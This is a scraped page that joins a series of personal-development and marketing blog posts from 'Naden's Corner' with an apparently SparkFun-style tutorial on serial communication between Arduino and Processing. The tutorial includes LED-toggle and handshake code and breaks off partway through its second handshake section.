listen to someone opine about the new ‘can’t miss’ strategy for success.<br /><br />The big problem: these talks are usually presented without flair, vocal intonation, and variety. I am not recommending that you tell those treasured jokes you’<span class="blsp-spelling-error" id="SPELLING_ERROR_1">ve</span> been holding onto for ages, but I am instructing that you ‘break out of corporate speak’ and provide memorable, remarkable information for your audience.<br /><br />The people in the audience don’t want monotone. They desire stories and a voice tone that ebbs and flows like the rising tide.<br /><br />Be real. Be authentic. Get your message across with an energy, variety, and believability that will have your audience saying: ‘I really liked that presentation. It was simple to follow and easy to remember’.<br /><br />When you are constructing a talk for a large/small group session, answer this question:<br />How will my audience best be persuaded, informed, or motivated by what I communicate? Typically, you’ll find ‘the answer’ evolves around being confident, colorful, and engaging in all that you say and do.<br /><br />Until next time,<br /><br />Dan <span class="blsp-spelling-error" id="SPELLING_ERROR_2">Naden</span><div class="blogger-post-footer"><img width='1' height='1' src=''/></div>Dan Naden them you care through your posture<a href=""><img id="BLOGGER_PHOTO_ID_5279259314032933170" style="FLOAT: right; MARGIN: 0px 0px 10px 10px; WIDTH: 200px; CURSOR: hand; HEIGHT: 165px" alt="" src="" border="0" /></a><br /><div><span class="blsp-spelling-error" id="SPELLING_ERROR_0">Ok</span>, so you’<span class="blsp-spelling-error" id="SPELLING_ERROR_1">ve</span> fully digested non-verbal communication step #1, eye contact. Now, it is time for #2.<br /><br /><strong>Posture</strong>.<br /><br />When talking to a group (whether in a small or large setting), it is essential that you ‘own’ the stage.<br /><br />Much of this ‘ownership’ emanates from your ability to non-verbally communicate confidence, poise, and transparency.<br /><br />Watch the great speakers and you’ll see no fear, doubt, and a posture that magnetizes. The shoulders are back, the body is relaxed, and there’s a slight lean towards the audience – the exact group you are trying to influence, persuade, or inform.<br /><br />These <span class="blsp-spelling-error" id="SPELLING_ERROR_2">learnings</span> don’t just have to be put in place for large group presentations. In small one-on-one (seated) meetings, follow this posture prescription:<br /><br /><strong>1. Don’t slump in your chair. It makes you look tired, disinterested, and unprofessional.<br />2. Uncross your arms and legs to communicate an open, connected message.<br />3. Keep your body facing the person(s) to whom you are speaking. Slightly turning your body away from the audience tells them that you <span class="blsp-spelling-error" id="SPELLING_ERROR_3">aren</span>’t important and you’<span class="blsp-spelling-error" id="SPELLING_ERROR_4">ve</span> rather be doing something else.</strong><br /><br />Owning the stage and sending off the right non-verbal message through your posture takes practice, yet its mastery will help you build better relationships, and tell a more convincing message.<br /><br />Want more? Non-verbal tip #3 is right around the corner.<br /><br />Until next time,<br /><br />Dan <span class="blsp-spelling-error" id="SPELLING_ERROR_5">Naden</span></div><div class="blogger-post-footer"><img width='1' height='1' src=''/></div>Dan Naden communication: Use it to your advantage<a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href=""><img id="BLOGGER_PHOTO_ID_5273820091459395490" style="FLOAT: right; MARGIN: 0pt 0pt 10px 10px; WIDTH: 200px; CURSOR: pointer; HEIGHT: 150px" alt="" src="" border="0" /></a><br />Talk, talk, talk; all we do is talk, talk.<br /><br /><p class="MsoNormal"><?xml:namespace prefix = o /><o:p></o:p></p><p class="MsoNormal">It is a treasure these days to engage with a true listener. Someone who is really listening and absorbing what you are saying. Not only are you able to truly connect with the person with whom you are speaking, but you’ll retain and remember more of what was actually said.<br /><br />There’s another hidden bonus. If you listen well, you are also able to spot key non-verbal clues.<br /><br />Here’s the first of 3 helpful hints to improve your non-verbal communication skills:<br /><br /><b>Eye contact:<br /></b>Despite today’s hectic pace, it is essential that you keep eye contact with all of those with whom you are communicating. Nothing communicates trust, warmth, honesty, and interest more than eye contact.<br /><br />Don’t go overboard. Eye contact should be consistent, yet you should not burn holes in the other person’s eye sockets. Make it natural. You will find that you are able to retain more of what is being communicating when you actually look at the person. </p><p class="MsoNormal"><o:p></o:p></p><p class="MsoNormal">Conversely, if you find the other person not looking at you while you are speaking, consider a change in venue to remove the obvious distractions. Should you have this conversation in a conference room vs. a crowded hallway?<br /><br />Maybe the person has many other topics on his or her mind. Politely ask the person if there is a better time to have a short conversation. The person will respect you for thinking of them and they’ll probably give you extra attention when the time comes for that special conversation.<br /><br />Stay tuned for two more important non-verbal communication tips. <span style="FONT-WEIGHT: bold">Tell a friend about Naden’s Corner</span>. When you do talk with them, please look them in the eye.<br /><br />Until next time,</p><p class="MsoNormal"><o:p></o:p></p><p class="MsoNormal"><?xml:namespace prefix = st1 /><st1:personnameDan Naden</st1:personname></p><div class="blogger-post-footer"><img width='1' height='1' src=''/></div>Dan Naden Metaphors to Make it Stick<a href=""><img id="BLOGGER_PHOTO_ID_5268615268351062322" style="FLOAT: right; MARGIN: 0px 0px 10px 10px; WIDTH: 200px; CURSOR: hand; HEIGHT: 142px" alt="" src="" border="0" /></a>We all know that we live in a constantly-changing workplace.<br />Your job description may vary from week-to-week and from quarter-to-quarter.<br />You may have one boss today and another boss next month.<br />Your market’s ‘sweet-spot’ may morph and change within a moment’s notice.<br /><br />It is expected that you deal and adapt with the changing environment, or you will flounder.<br /><br />I wanted to direct everyone to a great article on dealing with job survival in today’s changing times.<br /><br />The stellar part of this article is not just the content, but the approach that the author takes in using the ‘whitewater’ image in describing today’s chaotic times. I believe this metaphor is on target for today’s professional. Dealing with change and uncertainty will truly separate achievement from mediocrity. You can’t constantly fight the current (company reorganization, new boss, new assignments); you must look for the opportunity within all of the tumult.<br /><br />Tell your story using metaphors to really make an impression and cause your message to stick with your audience. And don’t sweat change; there’s more of it coming.<br /><br />Job Survival Advice: Don’t Fear the Whitewater<br /><a href=""></a><br /><br />Until next time,<br /><br />Dan Naden<br />Naden's Corner<div class="blogger-post-footer"><img width='1' height='1' src=''/></div>Dan Naden a better person (or leader) is a process not an event.<a href=""><img id="BLOGGER_PHOTO_ID_5264198066077928194" style="FLOAT: right; MARGIN: 0px 0px 10px 10px; WIDTH: 200px; CURSOR: hand; HEIGHT: 133px" alt="" src="" border="0" /></a>Final step: Becoming a better person (or leader) is a process not an event.<br /><br /><div>We’ve all been there. It is your company’s annual training event. Everyone parades into a room and talks about how our company can become more innovative or better team players. The ideas fly around like wildfire; team members are energized, engaged, and motivated, but then something happens – they leave the ‘training room’ and return to their normal, day-to-day responsibilities. The company’s excitement over innovation or team-building fades like a meteor passing through the night sky.<br /><br />Don’t fall into this trap on a personal level. You won’t lose 20 pounds overnight. You may not quit smoking on the first try. You can’t become a better public speaker by watching a video. Learning to change behavior is a marathon not a sprint. Develop a long-term, sustainable, on-going plan to change a certain behavior; check in with others on your progress; celebrate the small successes along the way. Before you know it, you’ll be onto your next improvement area.<br /><br />Don’t forget the book to read: Marshall Goldsmith’s: “<a href="">What Got You Here, Won’t Get You There</a>.”</div><div> </div><div>Until next time, </div><div> </div><div>Dan Naden</div><div class="blogger-post-footer"><img width='1' height='1' src=''/></div>Dan Naden up with People to Get BetterLet’s say you are a project manager at work. You missed a few key technical components for a project mid-stream. You’ve heard it from your boss, your colleagues, even your dog. So what do you do?<br /><br />1. Apologize to the team for your oversight. They’ll like you for it.<br /><br />2. Tell each team member that you want to improve your understanding of the project’s technical components.<br /><br />3. Map out a ‘touch point’ plan to ask each team member the following: “How am I doing with improving my technical understanding?”<br /><br />4. Thank each team member for their generosity in helping you grow in your role. Ask them if there’s anything you can do for them. Try it; it works.<br /><br />Next time: The Final step. The Process of Becoming a Leader<div class="blogger-post-footer"><img width='1' height='1' src=''/></div>Dan Naden Michael Dell and Lance Armstrong can teach us about change<a href=""><img id="BLOGGER_PHOTO_ID_5252028039314392722" style="FLOAT: right; MARGIN: 0px 0px 10px 10px; CURSOR: hand" alt="" src="" border="0" /></a> We marvel at the accomplishments of the finest ‘doers’ of our time. How about <a href="">Lance Armstrong</a>’s miraculous recovery from cancer to win perhaps the world’s most grueling event – the Tour De France (7 times)? Remember the start of Michael <a href="">Dell</a>’s brilliant, revolutionary direct to consumer business model for selling computers?<br /><br />For both of these examples, there certainly was a level of comprehension or understanding that Lance and Michael endured on the way towards their unparallel success. Did Lance settle on just understanding what it would take to be a Tour De France champion – the timing, the nutrition, and the perseverance? Did Michael Dell just ‘relax’ when he drew out the plan to remove the middleman from the computer sales process? No and No.<br /><br />Both individuals understood, comprehended, and then ACTED. Action is of paramount importance here. If Lance and Michael just thought about their dreams and goals and never acted, think of the dissatisfaction that they would feel.<br /><br />Think about what you want. Map out a plan to get there and ACT on it.<br /><br />Next time: Step 3: People Need Follow-up to Get Better<br /><div></div><br /><div>Dan Naden</div><br /><div>Naden's Corner</div><div class="blogger-post-footer"><img width='1' height='1' src=''/></div>Dan Naden to Change Behavior<a href=""><img id="BLOGGER_PHOTO_ID_5251067707515977346" style="FLOAT: right; MARGIN: 0px 0px 10px 10px; CURSOR: hand" alt="" src="" border="0" /></a>People don’t change because they are too busy. Change is difficult for most people. Whether it be changing a behavior at work, or improving as a husband and friend, people usually repel anything that isn’t ‘business as usual’.<br /><br />I am reading a fantastic book right now, “<a href="">What You Get Here, Won’t Get You There</a>” by Marshall Goldsmith. I couldn’t wait until its conclusion to share with you 4 ‘gems’. This is one of those books where you’ll need a notebook within arm’s length.<br /><br />Goldsmith is on target when he claims that one of the biggest detractors from changing is ‘being busy’. Yes, we all have enough to do to fill our days. Work, kids, hobbies, and friends – the list is endless. But are you filling your days with that items that matter the most to you?<br /><br />We must make ‘a change’ top of the list. If you want to learn the guitar, you MUST practice. You must push aside other ‘must dos’ and make guitar playing part of your normal routine. The other ‘busy stuff’ can’t be used as an excuse anymore. You’ve made a commitment to a change in behavior – learn to play the guitar – and you’ve placed it at the top of the list. It is as simple as that.<br /><br />Stay tuned for Step 2: There is an Big Gulf between Understanding and Doing.<br /><br />Until next time,<br /><br />Dan Naden<br />Naden's Corner<div class="blogger-post-footer"><img width='1' height='1' src=''/></div>Dan Naden Fargo helps give me back some of my day<a href=""><img id="BLOGGER_PHOTO_ID_5242944276200598306" style="FLOAT: right; MARGIN: 0px 0px 10px 10px; CURSOR: hand" alt="" src="" border="0" /></a>Something happened on the way to the <a href="">Wells Fargo </a>ATM the other day. My ATM got smarter.<br /><br />I would imagine most people withdraw the same amount of cash from their account on a somewhat regular basis. Whatever the amount ($50, $100, $150), you mindlessly move through the prompts until you have cash in hand.<br /><br />The other day, however, I was frozen in my tracks at the ATM. No, Pamela Anderson didn’t drive by the bank; the user experience remembered me!! I was routinely clicking through the screens (PIN, account type, amount to withdraw, etc.) when I noticed a ‘recent withdrawals’ area on the left-hand portion of the screen.<br /><br />There, conveniently within reach, was a list of the five most frequent transactions that I’ve made over the near future. They have essentially trimmed 6 clicks on the monitor down to 3.<br /><br />After logging into with my PIN, I choose one of the ‘frequently used options’, click confirm and my cash is in hand.<br />Compare this to the old scenario:<br />--Log in<br />--Choose withdrawal/deposit<br />--Choose account<br />--Choose amount<br />--Confirm<br />--Receipt?<br />--Cash in hand<br /><br />In today’s busy world, it is refreshing to see a company like Wells Fargo using technology to save time and make our lives easier. Those saved seconds add up to minutes and hours over a long period of time. Switching from Wells Fargo to another bank just got much tougher now.<br /><div></div><br /><div>Until next time, </div><br /><div>Dan Naden</div><div class="blogger-post-footer"><img width='1' height='1' src=''/></div>Dan Naden’s genius on display in the bathroom<a href=""><img id="BLOGGER_PHOTO_ID_5240763763746530850" style="FLOAT: right; MARGIN: 0px 0px 10px 10px; CURSOR: hand" alt="" src="" border="0" /></a>If you’ve ever been to <a href="">Fuddrucker’s</a>, you know they are famous for tasty burgers and chicken sandwiches in a kid-friendly environment. The casual environment welcomes all comers. There’s no pretense/ego at a Fuddrucker’s. It is nice to dine at a place that doesn’t take itself too seriously.<br /><br />Being a parent, I notice ‘different’ things now. At a playground, I analyze how safe a slide is for my children. I’ll stare down somewhere who is driving too fast in our neighborhood. At a restaurant, I’ll hope and pray that they have a kid’s menu and coloring book to keep the youngsters occupied.<br /><br />At a recent trip to Fuddrucker’s, they won me over as a kid-friendly establishment. As I was waiting for my cajun chicken sandwich, I ventured to the bathroom to wash my hands. Upon exiting the bathroom, I glanced down at the door and saw something remarkably brilliant. There, far below the reach of any adult, was a ‘kiddie handle’. My kids weren’t with me on this particular trip, but I would imagine they would have loved the kid-friendly touch. Perhaps I would have never rescued them out of that bathroom!! They would want to keep ‘testing’ the kiddie handle.<br /><br />Many probably don’t even recognize this slight nuance. I will definitely remember this ‘slight touch’ and keep them in mind next time the family goes out to dine. Any place that makes my kids feel special is a winner in my book.<br /><br />Does anyone have any memorable restaurant stories? Share with us.<br /><br />Until next time,<br /><br />Dan Naden<div class="blogger-post-footer"><img width='1' height='1' src=''/></div>Dan Naden NOT to get your house sold<a href=""><img id="BLOGGER_PHOTO_ID_5233073259571345122" style="FLOAT: right; MARGIN: 0px 0px 10px 10px; CURSOR: hand" alt="" src="" border="0" /></a>I was walking through our neighborhood the other day and saw a ‘For Sale’ sign in front of a house a few blocks away. This is nothing out of the ordinary as houses pop up for sale all of the time.<br /><br />I was shocked, however, by the realtor signage that was ‘supposedly’ designed to draw in interested buyers.<br /><br />The sign featured three different numbers (one listed twice) on the 2x4 foot sign.<br /><br />===================<br />It looked like this:<br />For Sale:<br />Call xxx-xxx-xxxx for hot facts on this home.<br /><br />Sizzling Home Agency<br />Sally Jones<br />xxx-xxx-xxxx<br /><br />Sizzling Homes<br />xxx-xxx-xxxx<br /><br />Sally Jones<br />xxx-xxx-xxxx<br />===================<br /><br />If the goal is to get me to remember a phone number as I drive by, or stop and write a phone number down, I think this home has failed on all counts.<br /><br />Why not just focus on one number and diminish the noise? Not only did the above sign provide ‘way’ too much information for a small sign, but it did nothing to distinguish the ‘most important’ phone number.<br /><br />The goal is to convert browser to buyers for this property. Make it as easy (and straightforward) as possible to get an interested consumer in touch about this property.<br />One phone number is preferable.<br /><div></div><br /><div>Until next time, </div><br /><div>Dan Naden</div><br /><div></div><div class="blogger-post-footer"><img width='1' height='1' src=''/></div>Dan Naden Tips to Getting your E-mails Read<a href=""><img id="BLOGGER_PHOTO_ID_5226781813306283858" style="FLOAT: right; MARGIN: 0px 0px 10px 10px; CURSOR: hand" alt="" src="" border="0" /></a><strong>1.</strong> <strong>Keep it short and sweet</strong>. People don't want to read a dissertation. If you need to have a discussion, set a meeting, or make a phone call. It helps to read over the e-mail and see if there are parts you can remove. If in doubt, keep it brief. People are busy.<br /><br /><strong>2.</strong> <strong>Make the subject line compelling</strong>. We get A TON of e-mail these days. People have very short attention spans and you need to really grab their attention to keep them focused. Whether it's an e-mail to a friend, colleague, boss, or prospective client, use language that would give them a compelling hint at why they should invest the time in YOUR e-mail, not the other hundreds that they have waiting in their in-box.<br /><div></div><br /><div>You receive an e-mail from your boss after a team meeting. Which e-mail are you more likely to open based on the subject line?<br />Good: The most important thing I learned in the meeting was….<br />Bad: Regarding the meeting we had last week….<br /><br /><strong>3. Make it easy for them to take the next step</strong>. What are you trying to accomplish with your e-mail? Are you selling something? Are you informing a friend about golf round, movie night, or party? Venting to a co-worker? </div><br /><div>Consider your end goal in mind with each e-mail you send. If you are pushing the recipient to click a link, then make that link the most visually-important element on the page. If you want your boss to consider a project idea for an upcoming meeting, convincingly set the stage for the meeting in the e-mail and then get out of your own way. </div><br /><div>Good luck. </div><br /><div></div><div>Until next time, </div><div>Dan Naden</div><br /><div></div><div class="blogger-post-footer"><img width='1' height='1' src=''/></div>Dan Naden U2 Concert Video You'll Never Forget<a href=""><img id="BLOGGER_PHOTO_ID_5221207267253029746" style="FLOAT: right; MARGIN: 0px 0px 10px 10px; CURSOR: hand" alt="" src="" border="0" /></a> “All is quiet on New Year’s Day.”<br />“A world in white gets underway.”<br /><br />These two phrases are immediately recognized by a large portion of this population. These are lyrics from <a href="">U2</a>’s classic song, “New Year’s Day”. Don’t they have like 15 songs that could be considered classics?<br /><br />I had a chance to see and experience U2’s Concert Video at Austin’s <a href="">Bob Bullock Museum</a>; I highly recommend that you see this show.<br /><br />Bono’s singing and audience interactions were a thing of legend; you truly felt him reach into your seat with the 3d effects. (Don’t be embarrassed about the overly large glasses.) Bono knows how to engage an audience and is certainly one of the leading music frontmen of all-time. Edge’s guitar playing rang, jangled and jammed throughout the packed Buenos Aires soccer stadium.<br /><div><br />The Argentinean crowd throbbed and pulsed their way through the 80-minute set; U2 was visibly floored by the commitment and vocal harmonies of the thousands who saw this event live.<br /><br /></div><div>Austinites - Listen up!!<br />Here’s a link to the ‘colorful’ concert schedule from the museum’s site: <a href="" target="_blank" rel="nofollow"></a> (You better hurry; this weekend looks like the last one for the show.) This is definitely a ‘can’t miss’ event.<br /><br />U2 believes in what they do.<br />U2 is a true group (not a bunch of individuals).<br />U2 works hard each night to give its audience the very best.<br />We can learn from this in our personal and professional lives. </div><br /><div>Until next time..</div><div>Dan Naden</div><div>Naden's Corner</div><div class="blogger-post-footer"><img width='1' height='1' src=''/></div>Dan Naden Future of Advertising: Baseball Style<a href=""><img id="BLOGGER_PHOTO_ID_5218790834019140594" style="FLOAT: right; MARGIN: 0px 0px 10px 10px; CURSOR: hand" alt="" src="" border="0" /></a>Last weekend, under the surprisingly cool Central Texas summer night, I attended the <a href="">Round Rock Expres</a>s baseball night. The game was incredibly one-sided with Round Rock smashing the ball all around the beautiful surroundings. The cheers from the Express faithful were frequent throughout the 10-2 victory.<br /><br /><a href="">Nyle Maxwell</a>, a local Central Texas car dealer, was a big advertiser on this night. They didn’t just throw their name on the outfield wall and expect results. Instead, they took a chance.<br /><br />Walking into the stadium, you’ve were surrounded by some finely-shined vehicles from Maxwell’s inventory. You couldn’t miss the vehicles. They were strategically placed right near the fan entrance. SUVs, pickups, mid-size cars all got some prime-time exposure from the passers-by. I saw quite a few glances at the ‘sticker’ and more than a few comments like: “Honey, what do you think about this one?”<br /><br />As the game progressed, Maxwell continued into strategy to get its name/brand on your mind; Maxwell raffled away 4 cars during the course of the game despite the fact that these cars weren’t ‘gems’. Between innings, the cars (old beat-up conversion vans and pick-ups from the 80s) were driven on the field complete with characters from ‘Saved by the Bell ’ and ‘the Breakfast Club’. Great storytelling -- not just blatant product placement.<br /><br />The crowd laughed, cheered and had a blast as Maxwell received great exposure and established goodwill by giving away free stuff. And think: they could have just placed a newspaper or TV ad.<br /><div></div><br /><div>Until next time,<br />Dan Naden</div><div>Naden's Corner</div><div class="blogger-post-footer"><img width='1' height='1' src=''/></div>Dan Naden to Stay Competitive in Today’s Economy<a href=""><img id="BLOGGER_PHOTO_ID_5217273008036601378" style="FLOAT: right; MARGIN: 0px 0px 10px 10px; CURSOR: hand" alt="" src="" border="0" /></a>It takes an effort (a Herculean effort sometimes) to stay on top of the changing trends, breakthroughs, and happenings within your industry. This is a must-do, however, if you are to stay relevant as a ‘professional’ and continue to gain responsibilities, promotions, new assignments, and confidence.<br /><br />One tip that I recommend is the ‘weekend brain dump’. As each week progresses, I run across 10, 15, sometimes 20 articles that I must read. I subscribe to ‘way too many’ Internet newsletters just for this reason. These articles could be interesting news stories, breakthrough trends in marketing, good press for our business, or just something that catches my eye.<br /><br />I’<span class="blsp-spelling-error" id="SPELLING_ERROR_0">ve</span> created a folder in Outlook titled ‘PRINT’. When I find an article I like, I place it in the folder for ‘later reading’ rather than get distracted and dedicate 5-10 minutes to read the entire article. By the end of the week, I’<span class="blsp-spelling-error" id="SPELLING_ERROR_1">ve</span> placed a good number of relevant, timely, inspiring, and educational articles into the folder.<br /><br />Before I leave for the weekend, I print off each article (Printer-friendly format and double-sided to save paper) for further investigation. When I can grab 5 or 10 minutes on the weekend, I’ll quickly grab an article and dive into the contents.<br /><br />This technique helps me:<br /><ul><li>Stay focused at work</li><br /><li>Stay up-to-date on my industry</li><br /><li><div align="left">Get fired up for the challenges of the new week<br /><br />Try it – you just might like it.<br /><br />Do you have a productivity tip that you'd like to share? Leave me a comment. </div></li></ul><br /><p>Until next time, </p><p>Dan <span class="blsp-spelling-error" id="SPELLING_ERROR_2">Naden</span><br /><span class="blsp-spelling-error" id="SPELLING_ERROR_3">Naden's</span> Corner</p><div class="blogger-post-footer"><img width='1' height='1' src=''/></div>Dan Naden Greatest Sport You'll Never Know<a href=""><img id="BLOGGER_PHOTO_ID_5212112120197026306" style="FLOAT: right; MARGIN: 0px 0px 10px 10px; CURSOR: hand" alt="" src="" border="0" /></a>They are some of the most finely conditioned athletes in the world. They glide, stop, sprint, hit, punch, lunge while trying to guide a small black disc past a heavily-padded goaltender.<br /><br /><div>This is not soccer or lacrosse, but hockey. Hockey's season, which stretches from October to June (isn't a 9-month season a little excessive?) just ended with Detroit snaring Lord Stanley's Cup. </div><br /><div>Unless you live in the Northeast or Midwest, you'll hardly grow up following hockey. The <a href="">NHL</a>, however, has nearly 30 teams in such hockey strongholds (yeah, right) as Columbus, OH, Nashville, TN, and Tampa, FL. I watched most of the Stanley Cup final between Detroit and Pittsburgh yet the regular season did not register. I live in Austin, Texas (not exactly <span class="blsp-spelling-error" id="SPELLING_ERROR_0">hockeytown</span>, USA), but it is a city with a large number of northern transplants. Hockey's marketing push, however, is silent in this Central Texas town. </div><br /><div>I think some regular season games are on NBC and Versus, although the days, times, and teams involved as a mystery to me.<br /></div><br /><div>My point is this: Hockey is an exciting, fast-paced and compelling sport, yet no one knows about it. There are a large number of hockey fans in Austin, Texas, but this audience gets ignored when it comes to marketing of the sport. How's hockey going to stay relevant in the next 10-15 years with this silent marketing push? </div><br /><div>Until next time, </div><br /><br /><div>Dan <span class="blsp-spelling-error" id="SPELLING_ERROR_1">Naden</span><br /></div><br /><div><span class="blsp-spelling-error" id="SPELLING_ERROR_2">Naden's</span> Corner</div><div class="blogger-post-footer"><img width='1' height='1' src=''/></div>Dan Naden
|
http://feeds.feedburner.com/NadensCorner
|
crawl-002
|
refinedweb
| 7,997
| 62.98
|
Connecting Arduino to Processing
Introduction
So, you’ve blinked some LEDs with Arduino, and maybe you’ve even drawn some pretty pictures with Processing - what’s next? At this point you may be thinking, ‘I wonder if there’s a way to get Arduino and Processing to communicate to each other?’. Well, guess what - there is! - and this tutorial is going to show you how.
In this tutorial we will learn:
- How to send data from Arduino to Processing over the serial port
- How to receive data from Arduino in Processing
- How to send data from Processing to Arduino
- How to receive data from Processing in Arduino
- How to write a serial ‘handshake’ between Arduino and Processing to control data flow
- How to make a ‘Pong’ game that uses analog sensors to control the paddles
Before we get started, there are a few things you should be certain you’re familiar with to get the most out of this tutorial:
- What’s an Arduino?
- How to use a breadboard
- Working with wire
- What is serial communication?
- Some basic familiarity with Processing will be useful, but not strictly necessary.
From Arduino...
Let’s start with the Arduino side of things. We’ll show you the basics of how to set up your Arduino sketch to send information over serial.
- First things first. If you haven’t done so yet, download and install the Arduino software for your operating system. Here’s a tutorial if you get stuck.
- You’ll also need an Arduino-compatible microcontroller and an appropriate way to connect it to your computer (an A-to-B USB cable, micro USB, or FTDI breakout). Check this comparison guide if you’re not sure what’s right for you.
Ok. You should by this point have the Arduino software installed, an Arduino board of some kind, and a cable. Now for some coding! Don’t worry, it’s quite straightforward.
- Open up the Arduino software. You should see something like this:
The nice big white space is where we are going to write our code. Click in the white area and type the following (or copy and paste if you feel lazy):
language:cpp void setup() { //initialize serial communications at a 9600 baud rate Serial.begin(9600); }
This is called our setup method. It’s where we ‘set up’ our program. Here, we’re using it to start serial communication from the Arduino to our computer at a baud rate of 9600. For now, all you need to now about baud rate is that (basically) it’s the rate at which we’re sending data to the computer, and if we’re sending and receiving data at different rates, everything goes all gobbledy-gook and one side can’t understand the other. This is bad.
After our
setup() method, we need a method called
loop(), which is going to repeat over and over as long as our program is running. For our first example, we’ll just send the string ‘Hello, world!’ over the serial port, over and over (and over). Type the following in your Arduino sketch, below the code we already wrote:
language:cpp void loop() { //send 'Hello, world!' over the serial port Serial.println("Hello, world!"); //wait 100 milliseconds so we don't drive ourselves crazy delay(100); }
That’s all we need for the Arduino side of our first example. ‘upload’ button to load your code onto the Arduino.
Now we’re ready to see if we can magically (or through code) detect the ‘Hello, world!’ string we’re sending from Processing.
...to Processing
Our task now is to find a way to listen in on what our Arduino sketch is sending. Luckily, Processing comes with a Serial library designed for just this kind of thing! If you don’t have a version of Processing, make sure you go to Processing.org and download the latest version for your operating system. Once Processing is installed, open it up. You should see something like this:
Looks a lot like Arduino, huh? The Arduino software was actually based in part off of Processing - that’s the beauty of open-source projects. Once we have an open sketch, our first step is to import the Serial library. Go to Sketch->Import Library->Serial, as shown below:
You should now see a line like
import processing.serial.*; at the top of your sketch. Magic! Underneath our import statement we need to declare some global variables. All this means is that these variables can used anywhere in our sketch. Add these two lines beneath the import statement:
language:java Serial myPort; // Create object from Serial class String val; // Data received from the serial port
In order to listen to any serial communication we have to get a Serial object (we call it
myPort but you can it whatever you like), which lets us listen in on a serial port on our computer for any incoming data. We also need a variable to recieve the actual data coming in. In this case, since we’re sending a String (the sequence of characters ‘Hello, World!’) from Arduino, we want to receive a String in Processing.
Just like Arduino has
setup() and
loop(), Processing has
setup() and
draw() (instead of loop).
For our
setup() method in Processing, we’re going to find the serial port our Arduino is connected to and set up our Serial object to listen to that port.
language:java // I know that the first port in the serial list on my mac // is Serial.list()[0]. // On Windows machines, this generally opens COM1. // Open whatever port is the one you're using. String portName = Serial.list()[0]; //change the 0 to a 1 or 2 etc. to match your port myPort = new Serial(this, portName, 9600);
Remember how we set
Serial.begin(9600) in Arduino? Well, if we don’t want that gobbledy-gook I was talking about, we had better put 9600 as that last argument in our Serial object in Processing as well. This way Arduino and Processing are communicating at the same rate. Happy times!
In our
draw() loop, we’re going to listen in on our Serial port and we get something, stick that something in our
val variable and print it to the console (that black area at the bottom of your Processing sketch).
language:java void draw() { if ( myPort.available() > 0) { // If data is available, val = myPort.readStringUntil('\n'); // read it and store it in val } println(val); //print it out in the console }
Ta-Da! If you hit the ‘run’ button (and your Arduino is plugged in with the code on the previous page loaded up), you should see a little window pop-up, and after a sec you should see `Hello, World!‘ appear in the Processing console. Over and over. Like this:
Excellent! We’ve now conquered how to send data from Arduino to Processing. Our next step is figure out how go the opposite way - sending data from Processing to Arduino. ‘1’ whenever we click our mouse in the Processing window. We’ll also print it out on the console, just to see that we’re actually sending something. If we aren’t clicking we’ll send a ‘0’?
...to Arduino
Ok! On this page we’re going to look for those 1’s coming in from Processing, and, if we see them, we’re going to turn on an LED on pin 13 (on some Arduinos, like the Uno, pin 13 is the on-board LED, so you don’t need an external LED to see this work).
At the top of our Arduino sketch, we need two global variables - one for holding the data coming from Processing, and another to tell Arduino which pin our LED is hooked up to.
language:cpp char val; // Data received from the serial port int ledPin = 13; // Set the pin to digital I/O 13
Next, in our
setup() method, we’ll set the LED pin to an output, since we’re powering an LED, and we’ll start Serial communication at 9600 baud.
language:cpp void setup() { pinMode(ledPin, OUTPUT); // Set pin as OUTPUT Serial.begin(9600); // Start serial communication at 9600 bps }
Finally, in the
loop() method, we’ll look at the incoming serial data. If we see a ‘1’, we set the LED to HIGH (or on), and if we don’t (e.g. we see a ‘0’ instead), we turn the LED off. At the end of the loop, we put in a small delay to help the Arduino keep up with the serial stream.
language:cpp void loop() { if (Serial.available()) { // If data is available to read, val = Serial.read(); // read it and store it in val } if (val == '1') { // If 1 was received digitalWrite(ledPin, HIGH); // turn the LED on } else { digitalWrite(ledPin, LOW); // otherwise turn it off } delay(10); // Wait 10 milliseconds for next reading }
This is what your code should look like when you’re done:
Voila! If we load up this code onto our Arduino, and run the Processing sketch from the previous page, you should be able to turn on an LED attached to pin 13 of your Arduino, simply by clicking within the Processing canvas.
Shaking Hands (Part 1)
So far we’ve shown that Arduino and Processing can communicate via serial when one is talking and the other is listening. Can we make a link that allows data to flow both ways, so that Arduino and Processing are both sending and receiving data? You bet! In the biz we call this a serial ‘handshake’, since both sides have to agree when to send and receive data.
On this page and the next, we’re going to combine our two previous examples in such a way that Processing can both receive ‘Hello, world!’ from Arduino AND send a 1 back to Arduino to toggle an LED. Of course, this also means that Arduino has to be able to send ‘Hello, world!’ while listening for a 1 from Processing. Whew!
Let’s start with the Arduino side of things. In order for this to run smoothly, both sides have to know what to listen for and what the other side is expecting to hear. We also want to minimize traffic over the serial port so we get more timely responses.
Just like in our Serial read example, we need a variable for our incoming data and a variable for the LED pin we want to light up:
language:cpp char val; // Data received from the serial port int ledPin = 13; // Set the pin to digital I/O 13 boolean ledState = LOW; //to toggle our LED
Since we’re trying to be efficient, we’re going to change our code so that we only listen for 1’s, and each time we hear a ‘1’ we toggle the LED on or off. To do this we added a boolean (true or false) variable for the HIGH or LOW state of our LED. This means we don’t have to constantly send a 1 or 0 from Processing, which frees up our serial port quite a bit.
Our
setup() method looks mostly the same, with the addition of an
establishContact() function which we’ll get to later - for now just type it in.
language:cpp void setup() { pinMode(ledPin, OUTPUT); // Set pin as OUTPUT //initialize serial communications at a 9600 baud rate Serial.begin(9600); establishContact(); // send a byte to establish contact until receiver responds }
In our loop function, we’ve just combined and slimmed down the code from our two earlier sketches. Most importantly, we’ve changed our LED code to toggle based on our new boolean value. The ‘!’ means every time we see a one, we set the boolean to the opposite of what it was before (so LOW becomes HIGH or vice-versa). We also put our ‘Hello, world!’ in an else statement, so that we’re only sending it when we haven’t seen a ‘1’ come in.
language:cpp void loop() { if (Serial.available() > 0) { // If data is available to read, val = Serial.read(); // read it and store it in val if(val == '1') //if we get a 1 { ledState = !ledState; //flip the ledState digitalWrite(ledPin, ledState); } delay(100); } else { Serial.println("Hello, world!"); //send back a hello world delay(50); } }
Now we get to that
establishContact() function we put in our
setup() method. This function just sends out a string (the same one we’ll need to look for in Processing) to see if it hears anything back - indicating that Processing is ready to receive data. It’s like saying ‘Marco’ over and over until you hear a ‘Polo’ back from somewhere.
language:cpp void establishContact() { while (Serial.available() <= 0) { Serial.println("A"); // send a capital A delay(300); } }
Your Arduino code should look like this:
That’s it for the Arduino side, now on to Processing!
Shaking Hands (Part 2)
For the Processing side of things, we’ve got to make a few changes. We’re going to make use of the
